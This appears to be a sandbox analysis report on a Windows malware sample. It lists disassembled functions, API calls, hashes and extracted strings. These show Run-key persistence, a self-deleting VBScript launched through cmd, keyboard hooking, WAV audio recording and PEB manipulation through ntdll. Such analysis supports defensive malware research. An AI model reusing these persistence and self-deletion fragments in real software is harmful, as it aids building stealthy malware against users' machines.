                              • Opcode ID: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                              • Opcode Fuzzy Hash: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                              Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                              • ExitProcess.KERNEL32 ref: 0040C63E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 1861856835-3168347843
                              • Opcode ID: f51bfa6b7c3f9999a45a680355c5bd22f20670f2917b1e3679d0a1efb1c896c2
                              • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                              • Opcode Fuzzy Hash: f51bfa6b7c3f9999a45a680355c5bd22f20670f2917b1e3679d0a1efb1c896c2
                              • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                              Function 0041A1BB Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 180synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                              • SetEvent.KERNEL32 ref: 0041A38A
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                              • CloseHandle.KERNEL32 ref: 0041A3AB
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                              • API String ID: 738084811-2745919808
                              • Opcode ID: 5b8ca1bb064d8b9a1923521c05ecac3758fe9787d692b5992abcb03318a6c91e
                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                              • Opcode Fuzzy Hash: 5b8ca1bb064d8b9a1923521c05ecac3758fe9787d692b5992abcb03318a6c91e
                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                              Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                              • ExitProcess.KERNEL32 ref: 0040C287
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                              • API String ID: 3797177996-1998216422
                              • Opcode ID: 6bcc088d61530c7c680840eab27c4b5acbfb500225eb43698b3115ac788db025
                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                              • Opcode Fuzzy Hash: 6bcc088d61530c7c680840eab27c4b5acbfb500225eb43698b3115ac788db025
                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                              Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Write$Create
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 1602526932-4212202414
                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                              Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                              • API String ID: 1646373207-3223399652
                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                              Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 0040BC75
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                              • _wcslen.LIBCMT ref: 0040BD54
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                              • _wcslen.LIBCMT ref: 0040BE34
                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                              • ExitProcess.KERNEL32 ref: 0040BED0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                              • String ID: 6$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$del$open$BG$BG
                              • API String ID: 1579085052-526394719
                              • Opcode ID: e0a16f559127d09f0ccc6f97ebc8cf50c5a28ba69ebce78da21257fbd8aea4e5
                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                              • Opcode Fuzzy Hash: e0a16f559127d09f0ccc6f97ebc8cf50c5a28ba69ebce78da21257fbd8aea4e5
                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                              Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                              • lstrlenW.KERNEL32(?), ref: 0041B207
                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                              • _wcslen.LIBCMT ref: 0041B2DB
                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                              • GetLastError.KERNEL32 ref: 0041B313
                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                              • GetLastError.KERNEL32 ref: 0041B370
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                              • String ID: ?
                              • API String ID: 3941738427-1684325040
                              • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                              • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                              Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$EnvironmentVariable$_wcschr
                              • String ID:
                              • API String ID: 3899193279-0
                              • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                              • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                              Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                              • Sleep.KERNEL32(00000064), ref: 00412060
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                              • String ID: /stext "$HDG$HDG$>G$>G
                              • API String ID: 1223786279-3931108886
                              • Opcode ID: b54433d13c11c165ac155464e4e43aa2172903c58834ce8240512e9510c7ef5d
                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                              • Opcode Fuzzy Hash: b54433d13c11c165ac155464e4e43aa2172903c58834ce8240512e9510c7ef5d
                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                              Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                              Download Yara Rule
                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                              • GetCursorPos.USER32(?), ref: 0041CAF8
                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                              • ExitProcess.KERNEL32 ref: 0041CB74
                              • CreatePopupMenu.USER32 ref: 0041CB7A
                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                              • String ID: Close
                              • API String ID: 1657328048-3535843008
                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                              Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
